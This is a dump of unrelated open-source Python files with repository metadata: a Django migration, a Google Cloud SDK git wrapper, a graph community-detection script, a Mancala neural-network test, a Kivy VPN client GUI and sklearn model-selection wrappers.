81393b9d2b45da22c82c2041e6d293d0eea36740 | eb5663b38eb39e80bdb8291c445c7bb14dfcebff | /ipl/ipl/apps/matches/migrations/0005_auto_20191102_1208.py | 6dd442ae775c93ce3f8d9fe9ce9294ec561cae05 | [] | no_license | aadil-reckonsys/ipl-statistics | d8e04b320f89fc6cefc6997334beba8453ee4ba2 | fc59268bfc1e3330aa49125a2d5fe010d34645a9 | refs/heads/master | 2020-09-03T07:40:50.906479 | 2019-11-04T04:41:33 | 2019-11-04T04:41:33 | 219,418,756 | 1 | 0 | null | 2019-11-04T04:42:34 | 2019-11-04T04:42:34 | null | UTF-8 | Python | false | false | 381 | py | # Generated by Django 2.2.6 on 2019-11-02 12:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('matches', '0004_auto_20191102_1206'),
]
operations = [
migrations.RenameField(
model_name='delivery',
old_name='dismissed_kind',
new_name='dismissal_kind',
),
]
| [
"aadil@reckonsys.com"
] | aadil@reckonsys.com |
8bd3e7c8d668cfc74846117b6febfca47c28fc71 | 3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be | /google-cloud-sdk/lib/googlecloudsdk/shared/source/git.py | ee124d0731c0133d6e31483c44d56b4db9f1f8c3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | twistedpair/google-cloud-sdk | 37f04872cf1ab9c9ce5ec692d2201a93679827e3 | 1f9b424c40a87b46656fc9f5e2e9c81895c7e614 | refs/heads/master | 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 | Python | UTF-8 | Python | false | false | 9,823 | py | # Copyright 2015 Google Inc. All Rights Reserved.
"""Wrapper to manipulate GCP git repository."""
import errno
import os
import re
import subprocess
import textwrap
from googlecloudsdk.core import log
from googlecloudsdk.core.util import compat26
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
import uritemplate
# This regular expression is used to extract the URL of the 'origin' remote by
# scraping 'git remote show origin'.
_ORIGIN_URL_RE = re.compile(r'remote origin\n.*Fetch URL: (?P<url>.+)\n', re.M)
# This is the minimum version of git required to use credential helpers.
_HELPER_MIN = (1, 7, 9)
class Error(Exception):
  """Base class for all exceptions raised by this module."""
class UnknownRepositoryAliasException(Error):
  """Raised when a repository alias cannot be resolved for the project."""
class CannotInitRepositoryException(Error):
  """Raised when a local repository clone cannot be created."""
class CannotFetchRepositoryException(Error):
  """Raised when a repository cannot be fetched from the remote host."""
class GitVersionException(Error):
  """Raised when the installed git is older than the required version."""

  def __init__(self, fmtstr, cur_version, min_version):
    # fmtstr may reference the {cur_version} and {min_version} placeholders.
    super(GitVersionException, self).__init__(
        fmtstr.format(cur_version=cur_version, min_version=min_version))
class InvalidGitException(Error):
  """Raised when `git version` output is empty or not in the expected form."""

  def __init__(self, message):
    super(InvalidGitException, self).__init__(message)
class MissingCredentialHelper(Error):
  """Raised when the gcloud git credential helper cannot be found on PATH."""

  def __init__(self, message):
    super(MissingCredentialHelper, self).__init__(message)
def CheckGitVersion(version_lower_bound=None):
  """Returns true when the installed git version is >= version_lower_bound.

  Args:
    version_lower_bound: (int,int,int), The lowest allowed version, or None to
        just check for the presence of git.

  Returns:
    True if git is present (and, when version_lower_bound is given, at least
    that version).

  Raises:
    GitVersionException: if `git` was found, but the version is incorrect.
    InvalidGitException: if `git` was found, but the output of `git version` is
        not as expected.
    NoGitException: if `git` was not found.
  """
  try:
    output = compat26.subprocess.check_output(['git', 'version'])
    if not output:
      raise InvalidGitException('The git version string is empty.')
    if not output.startswith('git version '):
      raise InvalidGitException(('The git version string must start with '
                                 'git version .'))
    # Extract the first dotted triple, e.g. "1.9.5" out of
    # "git version 1.9.5 (Apple Git-50.3)".
    match = re.search(r'(\d+)\.(\d+)\.(\d+)', output)
    if not match:
      raise InvalidGitException('The git version string must contain a '
                                'version number.')
    cur_version = match.group(1, 2, 3)
    # Int tuples compare lexicographically, so (1, 7, 9) < (1, 10, 0).
    current_version = tuple([int(item) for item in cur_version])
    if version_lower_bound and current_version < version_lower_bound:
      min_version = '.'.join(str(i) for i in version_lower_bound)
      raise GitVersionException(
          ('Your git version {cur_version} is older than the minimum version '
           '{min_version}. Please install a newer version of git.'),
          output, min_version)
  except OSError as e:
    # ENOENT from check_output means the git binary itself is missing.
    if e.errno == errno.ENOENT:
      raise NoGitException()
    raise
  return True
class NoGitException(Error):
  """Raised when the git executable cannot be found at all."""

  def __init__(self):
    # User-facing message; dedent keeps the literal readable here while
    # printing flush-left.
    super(NoGitException, self).__init__(
        textwrap.dedent("""\
        Cannot find git. Please install git and try again.
        You can find git installers at [http://git-scm.com/downloads], or use
        your favorite package manager to install it on your computer. Make sure
        it can be found on your system PATH.
        """))
def _GetRepositoryURI(project, alias):
  """Build the cloud-source URI for a repository.

  Args:
    project: str, The project name.
    alias: str, The repository alias.

  Returns:
    str, The repository URI.
  """
  template = 'https://source.developers.google.com/p/{project}/r/{alias}'
  return uritemplate.expand(template, {'project': project, 'alias': alias})
def _GetCredentialHelper():
  """Return the git suffix of gcloud's credential helper.

  Looks for the helper installed with this Cloud SDK on PATH. Git prepends
  'git-credential-' itself, so only the suffix (name + extension) is
  returned.

  Returns:
    str, credential helper command name without the 'git-credential-' prefix.

  Raises:
    MissingCredentialHelper: if the credential helper cannot be found.
  """
  is_windows = (platforms.OperatingSystem.Current() ==
                platforms.OperatingSystem.WINDOWS)
  helper_ext = '.cmd' if is_windows else '.sh'
  helper_name = 'gcloud'
  found = files.FindExecutableOnPath('git-credential-' + helper_name,
                                     pathext=[helper_ext])
  if not found:
    raise MissingCredentialHelper(
        'Could not find gcloud\'s git credential helper. '
        'Please make sure the Cloud SDK bin folder is in PATH.')
  return helper_name + helper_ext
class Git(object):
  """Represents a project git repository and its clone operation."""

  def __init__(self, project_id, repo_name, uri=None):
    """Create a reference to a repository associated with a Cloud Project.

    Args:
      project_id: str, The name of the project that has a repository
          associated with it.
      repo_name: str, The name of the repository to clone.
      uri: str, The URI of the repository to clone, or None if it will be
          inferred from the name.

    Raises:
      UnknownRepositoryAliasException: If the repo name is not known to be
          associated with the project.
    """
    self._project_id = project_id
    self._repo_name = repo_name
    # Fall back to the canonical cloud-source URI when none is supplied.
    self._uri = uri or _GetRepositoryURI(project_id, repo_name)
    if not self._uri:
      raise UnknownRepositoryAliasException()

  def GetName(self):
    # The repository alias this object was constructed with.
    return self._repo_name

  def Clone(self, destination_path):
    """Clone a git repository into a gcloud workspace.

    If the destination already exists, verify (by scraping
    `git remote show origin`) that it is a clone of the same repository and
    abort instead of cloning; otherwise clone, configuring the gcloud
    credential helper for Google-hosted repositories.

    Args:
      destination_path: str, The relative path for the repository clone.

    Returns:
      str, The absolute path of cloned repository, or None if the clone
      already existed and was left untouched.

    Raises:
      CannotInitRepositoryException: If there is already a file or directory
          in the way of creating this repository.
      CannotFetchRepositoryException: If there is a problem fetching the
          repository from the remote host, or if the repository is otherwise
          misconfigured.
    """
    abs_repository_path = os.path.abspath(destination_path)
    if os.path.exists(abs_repository_path):
      CheckGitVersion()  # Do this here, before we start running git commands
      # First check if it's already the repository we're looking for.
      with files.ChDir(abs_repository_path) as _:
        try:
          output = compat26.subprocess.check_output(
              ['git', 'remote', 'show', 'origin'])
        except subprocess.CalledProcessError:
          raise CannotFetchRepositoryException(
              'Repository in [{path}] is misconfigured.'.format(
                  path=abs_repository_path))
        # Scrape the fetch URL of 'origin' and compare to the expected URI.
        output_match = _ORIGIN_URL_RE.search(output)
        if not output_match or output_match.group('url') != self._uri:
          raise CannotInitRepositoryException(
              ('Repository [{url}] cannot be cloned to [{path}]: there'
               ' is something already there.').format(
                   url=self._uri, path=abs_repository_path))
        else:
          # Repository exists and is correctly configured: abort.
          log.err.Print(
              ('Repository in [{path}] already exists and maps to [{uri}].'
               .format(path=abs_repository_path, uri=self._uri)))
          return None
    # Nothing is there, make a brand new repository.
    try:
      if (self._uri.startswith('https://code.google.com') or
          self._uri.startswith('https://source.developers.google.com')):
        # If this is a Google-hosted repo, clone with the cred helper.
        try:
          CheckGitVersion(_HELPER_MIN)
        except GitVersionException:
          # git too old for credential helpers: warn and clone without one.
          log.warn(textwrap.dedent("""\
              You are cloning a Google-hosted repository with a version of git
              older than 1.7.9. If you upgrade to 1.7.9 or later, gcloud can
              handle authentication to this repository. Otherwise, to
              authenticate, use your Google account and the password found by
              running the following command.
              $ gcloud auth print-refresh-token
              """))
          cmd = ['git', 'clone', self._uri, abs_repository_path]
          log.debug('Executing %s', cmd)
          subprocess.check_call(cmd)
        else:
          # git is new enough: wire up the gcloud credential helper.
          cmd = ['git', 'clone', self._uri, abs_repository_path,
                 '--config',
                 'credential.helper="{0}"'.format(_GetCredentialHelper())]
          log.debug('Executing %s', cmd)
          subprocess.check_call(cmd)
      else:
        # Otherwise, just do a simple clone. We do this clone, without the
        # credential helper, because a user may have already set a default
        # credential helper that would know the repo's auth info.
        subprocess.check_call(
            ['git', 'clone', self._uri, abs_repository_path])
    except subprocess.CalledProcessError as e:
      raise CannotFetchRepositoryException(e)
    return abs_repository_path
| [
"joe@longreen.io"
] | joe@longreen.io |
15732a57f132ed2f8ccbd8946e4896179e207627 | 84bd3c9ae988defff60b8a8bb080ddfe983dd03e | /code/misc.py | 0a44427a3cde1a53e9da8d133d1f8ee5dc3ba2bf | [] | no_license | ashwanikhemani/CRF | de5fed8e99db72c412710fabc2323874b3358034 | 568eb654db2fd08e1b30fb2078288e01a3afccc9 | refs/heads/master | 2020-03-22T08:32:00.435747 | 2018-09-23T17:58:09 | 2018-09-23T17:58:09 | 139,772,256 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #the orphaned functions that don't belong anywhere
def print_image(X):
    """Print a 16x8 image stored as a flat sequence, one row slice per line."""
    row_length = 8
    for start in range(0, 16 * row_length, row_length):
        print(X[start:start + row_length])
| [
"gmarat19@gmail.com"
] | gmarat19@gmail.com |
e860c0e792bd935c6f3dca00e8a1702e2609fa78 | 6f3a4ec0cb18aea374d130d4d2af4ccaad59f508 | /label_prop_tab1.py | 32dc81a42aaabb82784fc022be6048a787740368 | [] | no_license | AlessiaWent/Community-detection | a2786ce795b70bfc40f3202233f72ef3fdc4a906 | e4b12d7b6418f88b50a7a774e1c6677cbf97b0f8 | refs/heads/master | 2021-01-17T20:35:29.959860 | 2016-12-15T17:33:18 | 2016-12-15T17:33:18 | 68,443,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,357 | py | #The program reads a file containing the edges and corresponding weights, performs label propagation and outputs Table 1
#Usage: ./label_prop_tab1.py cftable nproc edges_file output_file
import codecs
from igraph import *
import time
from point_mix import Point
import random
import multiprocessing
from multiprocessing import Process
from Queue import Empty
from multiprocessing import Queue
from multiprocessing.managers import SyncManager
from functools import partial
import sys
import logging
#Computes the measures required for Table 1 for communities from beg to end
def writeslice1(beg,end,g,cfed_rev,que):
    """Compute the Table-1 per-vertex measures for communities in [beg, end).

    For each community index a subgraph is induced; when it has more than one
    vertex, per-vertex centrality measures are computed and formatted as CSV
    rows, which are pushed onto `que` for the parent process to collect.

    Args:
        beg, end: half-open range of community indices (the vertex "group"
            attribute compared is k-1).
        g: the full igraph Graph, carrying "group" and "name" vertex
            attributes.
        cfed_rev: dict mapping ID_CF -> ID_SOGGETTO.
        que: multiprocessing.Queue receiving the list of CSV lines.
    """
    result = []
    # One induced subgraph per community in the assigned slice.
    subs = [g.induced_subgraph([v for v in g.vs() if v["group"] == k-1]) for k in range(beg,end)]
    for ind in range(beg,end):
        sub = subs[ind-beg]
        # Singleton communities carry no meaningful centrality values.
        if sub.vcount() > 1:
            evcent = sub.evcent()
            prank = sub.pagerank()
            closeness = sub.closeness()
            betweenness = sub.betweenness()
            for v in sub.vs():
                deg = sub.degree(v)
                i = v["name"]
                # CSV row: ID_SOGGETTO,ID_CF,community,degree,normalized
                # degree,closeness,betweenness,eigenvector centrality,pagerank
                result.append(cfed_rev[i]+","+i+","+str(ind-1)+","+str(deg)+","+str(deg/float(sub.vcount()))+","+str(closeness[sub.vs.find(i).index])+","+str(betweenness[sub.vs.find(i).index])+','+str(evcent[v.index])+','+str(prank[v.index])+"\n")
    que.put(result)
# Command-line sanity checks.
# Usage: ./label_prop_tab1.py cftable nproc edges_file output_file
if len(sys.argv) <2:
    print 'please provide me input file'
    sys.exit()
if len(sys.argv) <3:
    print 'please provide me number of processors'
    sys.exit()
t_zero = time.time()
# Read the table mapping ID_SOGGETTO <-> ID_CF for every node of interest.
cfed = {}
cfed_rev = {}
cf = open(sys.argv[1], 'r')
for line in cf:
    line = line.strip().split(' ')
    cfed[line[0]] = line[1]
    cfed_rev[line[1]] = line[0]
cf.close()
print "reading all needed data"
print " complete reading dataset"
print 'initialization time (including reading data ) =', time.time() - t_zero
g = Graph()
g.add_vertices(cfed.values())
nproc = int(sys.argv[2])
n = len(cfed)
edges = []
weights = []
s = time.time()
# Load the edge list (tab-separated endpoint pairs).
edg = open(sys.argv[3], 'r')
for line in edg:
    k = line.strip().split('\t')
    edges.append((k[0], k[1]))
g.add_edges(edges)
g.simplify()
# Drop isolated vertices.
to_remove = g.vs.select(_degree = 0)
g.delete_vertices(to_remove)
# NOTE(review): `weights` is never filled while reading the edge file, so an
# empty list is assigned here even though the header says the input contains
# weights -- confirm whether column 3 of the edge file should be appended.
g.es["weight"] = weights
print 'Time to copy edges =', time.time() - s
# Fixed seed so the label propagation is reproducible.
random.seed(1234)
comm = g.community_label_propagation(weights = g.es["weight"])
g.vs["group"] = comm.membership
print '#clusters with more than 1 element: ', len([i for i in comm if len(i) > 1])
print '\n'
f = Queue()
out = time.time()
other_results = []
# Partition the community indices into nproc contiguous slices and hand one
# slice to each worker process.
nclu = max(comm.membership) + 2
step = nclu/nproc
if nclu%nproc > 0:
    step += 1
for proc_num in range(nproc):
    beg = proc_num*step
    end = min((proc_num+1)*step,nclu-1)
    proc = Process(target=writeslice1, args=[beg,end,g, cfed_rev,f])
    proc.start()
    print 'proc_num ='+str(proc_num)
# Collect one result list per worker from the shared queue.
while len(other_results)< nproc:
    print str(len(other_results))+'processes'
    other_results.append(f.get())
#writes results in output file
tab = open(sys.argv[4], 'w')
tab.write('ID_SOGGETTO,ID_CF,ID_COMMUNITY,DEGREE,NORM_DEGREE,CLOSENESS,BETWEENNESS,EIG_CENTRALITY,PAGERANK\n')
for r in other_results:
    for k in r:
        tab.write(k)
tab.close()
print 'OT ='+str(time.time() - out)
print 'TT ='+str(time.time() - t_zero)
"alexwent91@gmail.com"
] | alexwent91@gmail.com |
b5f225109cb48bec4a6038fd921fb471c7247f55 | 01fd020808e9bb2af4f47ca081c73f8328aab8b0 | /Mancala/Testselbstspielen.py | 27dabba8c13c1090e6674d6e65ca55fdad1ab61a | [] | no_license | JojoB96/Neuronale-Netze | 0d077e87510c3b13ea15bd7c3cf652e6bf3566f1 | 3401e3bd10d8ffd0d4fde6c3053fdd7669747949 | refs/heads/master | 2022-12-08T10:36:45.423260 | 2020-09-04T11:36:45 | 2020-09-04T11:36:45 | 271,476,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 15 14:15:22 2020
@author: johanna
"""
import numpy as np
import mancala as m
# Smoke-test script: pit a trained Mancala network against a human player.
ma = m.Mancala(exploration_rate = 0.2)
print("Start")
print(ma.net.biases)
print(ma.spielfeld[0:12])
#ma.train_net(500,25,1)
print("trained")
#print(ma.play())
print('play gegen Random')
matest = m.Mancala(exploration_rate = 0.2)
matest.net.load_network_from_files("Test")
Spieler1gewonnen = 0
Spieler2gewonnen = 0
unentschieden = 0
# NOTE(review): range(1, 1) is empty, so the game loop below never runs --
# presumably the upper bound should be the number of games to play.
for i in range (1,1):
    #print(i)
    # Play until one side's pits are all empty. (Checking whether a treasury
    # holds more than half of the beans would not be enough here, because
    # beans still on the board also count toward the final score.)
    while not(np.array_equal(matest.spielfeld[0:6] ,[0,0,0,0,0,0]) or np.array_equal(matest.spielfeld[6:12] ,[0,0,0,0,0,0])):
        #while not(matest.spielfeld[12]>36 or matest.spielfeld[13]>36 or (matest.spielfeld[12] == 36 and matest.spielfeld[13] == 36)):
        # Player 1: the network picks a pit.
        feld = matest.get_next_action(matest.spielfeld)
        matest.spielfeld, reward = matest.get_spielfeld_and_reward_after_action(matest.spielfeld, feld)
        # Player 2: the human.
        matest.spieler1 = not matest.spieler1
        print(matest.spielfeld)
        mulde = input("Eingabe: int zwischen 6 und 11")
        # NOTE(review): input() returns a str in Python 3, so `mulde - 6`
        # raises TypeError; an int() conversion appears to be missing.
        mulde = mulde-6
        #print(mulde)
        #print(matest.spielfeld)
        matest.spielfeld, reward = matest.get_spielfeld_and_reward_after_action(matest.spielfeld, mulde)
        matest.spieler1 = not matest.spieler1
        # matest.get_turned_spielfeld(matest.spielfeld)
        # print(matest.spielfeld)
    # Check who won: a treasury (index 12/13) holding more than half of the
    # 72 beans wins; 36/36 is a draw.
    if matest.spielfeld[12] > 36:
        Spieler1gewonnen += 1
    elif matest.spielfeld[13] > 36:
        Spieler2gewonnen += 1
    elif matest.spielfeld[12] == 36 and matest.spielfeld[13] == 36:
        unentschieden += 1
    #else:
    #    print(matest.spielfeld[0:6])
    #    print(matest.spielfeld[6:12])
    matest.reset()
# Percentages assume 100 games were played.
print("Netz", Spieler1gewonnen/100, "%")
print("Random", Spieler2gewonnen/100, "%")
print("unentschieden", unentschieden/100, "%")
| [
"johbeier@hotmail.de"
] | johbeier@hotmail.de |
ba44833508e64f5a05861a52410e91f082a08777 | bb0094791dd4c6f19bfbdfc342bfaec58f4ee04a | /SurfOnVpn/surfOnVpn.py | 540d3721e6afefc20184973be5650b454692c66f | [
"MIT"
] | permissive | prabhakar1998/SurfOnVpn | 6e74866cda22b12f940bd653ff0f806189fca5f5 | 74b8e28255e85a073300680475c9053407865904 | refs/heads/master | 2021-09-13T04:48:26.623150 | 2018-04-25T04:28:37 | 2018-04-25T04:28:37 | 115,930,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,089 | py | """Application File, This file is the main file to run.
Usage python3 surfOnVpn
Dependencies in setup.py file
"""
from threading import Thread
from os import system, popen
import subprocess as sub
from vpn import Vpn
from kivy.config import Config
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.lang import Builder
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
Config.set('graphics', 'minimum_width', '570')
Config.set('graphics', 'minimum_height', '600')
__author__ = "Prabhakar Jha"
__copyright__ = "Copyright (c) 2018 Prabhakar Jha"
__credits__ = ["Prabhakar Jha"]
__license__ = "MIT License"
__version__ = "1.0.0"
__maintainer__ = "Prabhakar Jha"
__email__ = "findmebhanujha@gmail.com"
global settings_menu
aboutus = '[font=RobotoMono-Regular] Hey there, I am Prabhakar Jha.\n'\
' Young and passonate guy who loves to \n solve challengin problem.'\
'\n This project was initiated to have a \n UI based proper free '\
' and open source VPN \n Software.\n This software is for '\
' educational purpose only.\n Any illegal use of this '\
' software is\n strictly prohibitted!. \n\n '\
' Contact me : [u]findmebhanujha@gmail.com [/u]\n[/font]'
contribute = '[font=RobotoMono-Regular] Liked my work.\n'\
' Great! you can also contribute to this project \n at'\
' the following link.\n\n '\
' [u]https://github.com/prabhakar1998/SurfOnVpn\n[/u][/font]'
install_requirements = ""
report_issue = "[font=RobotoMono-Regular]Contact Developer: "\
"[u]findmebhanujha@gmail.com[/u][/font]"
neeed_help = "[font=RobotoMono-Regular]Contact Developer: "\
" [u]findmebhanujha@gmail.com[/u][/font]"
settings_menu = {
"About Us": aboutus,
"Contribute": contribute,
"Install Requirements": install_requirements,
"Report An Issue": report_issue,
"Need Help": neeed_help}
class StartScreen(Screen):
    """Initial screen where the user supplies the root (sudo) password."""

    def verify_password(self, password_arg):
        """Check the given sudo password and advance to the main screen.

        Empty input and a wrong password each open an error popup; a correct
        password is stored in the module-level `password` global and the
        ScreenManager switches to "SurfOnVpn".
        """
        global password
        if password_arg == "":
            popup = Popup(title='No Password Entered',
                          content=Label(text="Please Enter The Password"),
                          auto_dismiss=True,
                          size_hint=(None, None),
                          size=(540, 350))
            popup.open()
        else:
            # Validate by running a harmless sudo command: empty output
            # means sudo rejected the password.
            # NOTE(review): the password is interpolated into a shell string
            # ("echo ... | sudo -S"); shell metacharacters in the password
            # will break or abuse this -- consider subprocess with input=.
            password = password_arg
            op = popen("echo {} | sudo -S ifconfig".format(password)).read()
            if op == "":
                popup = Popup(title='Incorrect Password',
                              content=Label(markup=True,
                                            text='[i]Double check password and try again.[/i]'),
                              auto_dismiss=True,
                              size_hint=(None, None),
                              size=(540, 350))
                popup.open()
            else:
                self.parent.current = "SurfOnVpn"
class SurOnVpnLayout(Screen, GridLayout):
    """Main screen of the application and its related functions."""

    def update_screen(self, level):
        """Update the connection-status widgets.

        Usage:
            update_screen(level):
            level = -1: Disconnected, level = 0: Connecting,
            level = 1: Connected, level = 2: Installing
        """
        if level == -1:
            self.ids.status.text = "Disconnected"
            self.ids.connect_button.text = "Connect"
            self.ids.connecting_gif.opacity = 0
            # RGBA green.
            self.ids.connect_button.background_color = 0, 1, 0, 1
        elif level == 0:
            self.ids.connecting_gif.opacity = 1
            self.ids.connect_button.text = "Connecting..."
            # NOTE(review): this assigns a 2-tuple where the other branches
            # assign 4-component RGBA, and 225 looks like a typo for 255 --
            # the line appears truncated; confirm the intended color.
            self.ids.connect_button.background_color = 204 / 225, 0,
        elif level == 1:
            self.ids.status.text = "Connected"
            # RGBA red (button now offers "Disconnect").
            self.ids.connect_button.background_color = 1, 0, 0, 1
            self.ids.connecting_gif.opacity = 0
            self.ids.connect_button.text = "Disconnect"
        elif level == 2:
            self.ids.status.text = "Installing Requirements"
            # RGBA yellow while apt-get runs.
            self.ids.connect_button.background_color = 1, 1, 0, 1
            self.ids.connecting_gif.opacity = 0
            self.ids.connect_button.text = "Installing...."

    def install_requirements(self):
        """Install openvpn via apt-get (no-op popup if already present)."""
        if self.check_packages() == 0:
            popup = Popup(title='Requirements Already Satishfied',
                          content=Label(markup=True,
                                        text='[font=RobotoMono-Regular]Requirements Already Satishfied. \nTry connecting to any server...[/font]'),
                          auto_dismiss=True,
                          size_hint=(None, None),
                          size=(540, 350))
            popup.open()
        else:
            # Runs apt-get with the stored sudo password piped via -S.
            system("echo {} | sudo -S apt-get update".format(password))
            system("echo {} | sudo -S apt-get install openvpn".format(password))
            # Re-check: if openvpn is still missing, the install failed.
            if self.check_packages() != 0:
                popup = Popup(title='Failed To Install',
                              content=Label(markup=True,
                                            text='Failed to intall\n Try running [u]sudo apt-get update[/u].'),
                              auto_dismiss=True,
                              size_hint=(None, None),
                              size=(540, 350))
                popup.open()
            self.update_screen(-1)

    def settings(self, text):
        """Dispatch a settings-menu selection.

        "Install Requirements" runs the installer on a background thread;
        any other entry (except the "Settings" header itself) shows the
        corresponding text from the module-level settings_menu dict.
        """
        global settings_menu, password
        if text == "Install Requirements":
            Thread(target=self.install_requirements).start()
            self.update_screen(2)
        elif text != "Settings":
            popup = Popup(title=text,
                          content=Label(markup=True, text=settings_menu[text]),
                          auto_dismiss=True,
                          size_hint=(None, None),
                          size=(540, 350),
                          )
            popup.open()

    def connect(self):
        """Download the selected VPN profile and connect to it."""
        global password
        self.vpn = Vpn(password)
        self.vpn.SELECTED_PROFILE = self.ids.spinner_id.text
        self.vpn.SELECTED_PROFILE_URL = self.vpn.\
            LIST_URL_VPNBOOK_PROFILES[self.vpn.SELECTED_PROFILE]
        status = self.vpn.download_profile()
        if status == -1:
            # Profile download failed: no working internet connection.
            popup = Popup(title='NO Internet Connection',
                          content=Label(text='Please Check If You Have A Working Internet Connection.'),
                          auto_dismiss=True,
                          size_hint=(None, None),
                          size=(540, 350))
            popup.open()
            self.update_screen(-1)
        else:
            if self.vpn.connect_profile() == -1:
                self.update_screen(-1)
                popup = Popup(title='Failed',
                              content=Label(text='Failed to connect. Try connecting with different server.'),
                              auto_dismiss=True,
                              size_hint=(None, None),
                              size=(540, 350))
                popup.open()
            else:
                self.update_screen(1)

    def check_packages(self):
        """Return 0 if openvpn is installed (per dpkg -s), else None."""
        process = sub.Popen(["dpkg", "-s", "openvpn"],
                            stdout=sub.PIPE, stderr=sub.PIPE)
        output, errors = process.communicate()
        output = output.decode('utf-8')
        # dpkg reports e.g. "Status: install ok installed" when present.
        for i in output.splitlines():
            if "Status" in str(i):
                if "installed" in str(i):
                    return 0

    def connect_button(self, value):
        """Handle a click on the connect button based on its current label."""
        if value == "Connect":
            # Currently disconnected: validate prerequisites, then connect
            # on a background thread so the UI stays responsive.
            if self.check_packages() == 0:
                if self.ids.spinner_id.text == "Select Server":
                    popup = Popup(title='Oops, You are here!',
                                  content=Label(
                                      text='Please Select Any Server!!'),
                                  auto_dismiss=True,
                                  size_hint=(None, None),
                                  size=(540, 350))
                    popup.open()
                else:
                    self.update_screen(0)
                    Thread(target=self.connect).start()
            else:
                popup = Popup(title='Requirements Missing',
                              content=Label(text='Go to settings and click on Install Requirements'),
                              auto_dismiss=True,
                              size_hint=(None, None),
                              size=(540, 350))
                popup.open()
        elif value == "Connecting...":
            # Connection attempt already in flight; ignore the click.
            pass
        elif value == "Disconnect":
            self.vpn.disconnect()
            self.update_screen(-1)
class ScreenManagement(ScreenManager):
    """Manages the transition from StartScreen to SurOnVpnLayout."""
    pass
presentation = Builder.load_file('surfOnVpn.kv')
class Application(App):
    """Kivy application wrapper for SurfOnVpn."""

    def build(self):
        """Set window title/icon and return the widget tree from the .kv file."""
        self.title = "SurfOnVpn"
        self.icon = "setting.png"
        return presentation
# Instantiate the app and hand control to Kivy's event loop.
app = Application()
app.run()
| [
"findmebhanujha@gmail.com"
] | findmebhanujha@gmail.com |
821692c00f4beae20681d0ca24a85d51f8daeaff | fda2cc97a3f0cb5598ff4d53f599cd5eedca6dc5 | /src/models/ml_model.py | 05a9f8f0f25b2a5f3c1f472ba37aa36768eba9b9 | [
"MIT"
] | permissive | sboomi/cp1 | a1f16e1c617708b9bc453137ccf485d253938c87 | 7f7aa96e8ba9cfe00802028a61bfba5e90c999f6 | refs/heads/main | 2023-04-27T14:30:09.093654 | 2021-04-30T20:56:05 | 2021-04-30T20:56:05 | 344,061,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import numpy as np
from typing import Dict, Any, Tuple
from sklearn.base import BaseEstimator
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import SVC
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import LogisticRegression
def generate_best_model(model_name: str,
                        X: np.ndarray,
                        y: np.ndarray) -> BaseEstimator:
    """Fetch a model wrapper by name and grid-search it on (X, y).

    Models available:
    * SVM: `svm`
    * Naive Bayes: `naive_bayes`
    * Logistic regression: `lr`

    Args:
        model_name (str): name of the model
        X (np.ndarray): The data with features
        y (np.ndarray): The labels

    Returns:
        The best fitted estimator and its cross-validation score, as the
        (estimator, score) tuple produced by ``fit_best_model``.

    Raises:
        KeyError: if ``model_name`` is not one of the supported keys.
    """
    # Map to classes (not instances) so only the requested wrapper -- and
    # its sklearn pipeline -- is ever constructed.
    wrappers = {
        "svm": BestSVM,
        "naive_bayes": BestNaiveBayes,
        "lr": BestLogisticRegression,
    }
    model = wrappers[model_name]()
    return model.fit_best_model(X, y)
class BestModel:
    """Base class for text-classification model wrappers.

    Subclasses populate ``model`` (a TF-IDF + estimator pipeline), ``name``
    and ``params`` (the grid-search space).
    """

    def __init__(self):
        self.model: BaseEstimator = None
        self.name: str = ""
        self.params: Dict[str, Any] = {}

    def fit_best_model(self,
                       X: np.ndarray,
                       y: np.ndarray) -> Tuple[BaseEstimator, float]:
        """Run a 5-fold grid search and return (best_estimator, best_score)."""
        search = GridSearchCV(self.model, self.params, cv=5)
        search.fit(X, y)
        return search.best_estimator_, search.best_score_

    def __str__(self):
        return f"{self.name}\nN° of params: {len(self.params)}"
class BestSVM(BestModel):
    """SVM wrapper: TF-IDF features + SVC with a C/gamma/kernel grid."""

    def __init__(self):
        super().__init__()
        self.model = make_pipeline(TfidfVectorizer(), SVC())
        self.name = SVC().__class__.__name__
        self.params = {
            "svc__C": np.logspace(0, 5, 10),
            "svc__gamma": np.logspace(-6, 0, 10),
            "svc__kernel": ["linear", "rbf"],
        }
class BestNaiveBayes(BestModel):
    """Naive-Bayes wrapper: TF-IDF features + MultinomialNB, alpha grid."""

    def __init__(self):
        super().__init__()
        self.model = make_pipeline(TfidfVectorizer(), MultinomialNB())
        self.name = MultinomialNB().__class__.__name__
        self.params = {
            "multinomialnb__alpha": np.linspace(0, 1, 20),
        }
class BestLogisticRegression(BestModel):
    """Logistic-regression wrapper: TF-IDF features + LogisticRegression."""

    def __init__(self):
        super().__init__()
        self.model = make_pipeline(TfidfVectorizer(), LogisticRegression())
        # Bug fix: the name was copy-pasted from BestNaiveBayes and
        # previously reported "MultinomialNB" for this wrapper.
        self.name = LogisticRegression().__class__.__name__
        # NOTE(review): "l1" requires a solver that supports it (liblinear/
        # saga); with the default lbfgs solver those grid points fail to fit
        # and are scored as errors by GridSearchCV -- confirm intended solver.
        self.params = {"logisticregression__C": np.logspace(-4, 5, 20),
                       "logisticregression__penalty": ["l1", "l2"]}
| [
"shadi.boomi@gmail.com"
] | shadi.boomi@gmail.com |
